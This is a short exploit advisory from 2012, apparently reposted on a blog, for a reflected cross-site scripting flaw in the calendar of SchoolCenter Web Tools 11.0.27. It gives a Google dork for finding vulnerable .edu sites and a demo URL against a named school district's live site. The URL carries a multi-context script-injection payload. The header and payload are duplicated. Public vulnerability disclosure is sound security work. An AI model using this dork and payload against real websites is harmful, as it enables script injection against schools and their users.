# Exploit Title: SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting
# Date: 11.04.2012
# Author: Sony and Flexxpoint
# Software Link: www.thinqed.com
# Google Dorks: inurl:/education/components/calendar/ site:edu
# Web Browser : Mozilla Firefox
# Site : http://insecurity.ro
# PoC:
http://st2tea.blogspot.com/2012/04/schoolcenter-web-tools-version-11027.html
..................................................................
Well, we have xss in calendar.
Demo:
http://schoolctr.hebisd.edu/education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3Eday
etc..
# Date: 11.04.2012
# Author: Sony and Flexxpoint
# Software Link: www.thinqed.com
# Google Dorks: inurl:/education/components/calendar/ site:edu
# Web Browser : Mozilla Firefox
# Site : http://insecurity.ro
# PoC:
http://st2tea.blogspot.com/2012/04/schoolcenter-web-tools-version-11027.html
..................................................................
Well, we have xss in calendar.
Demo:
http://schoolctr.hebisd.edu/education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3Eday
etc..
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.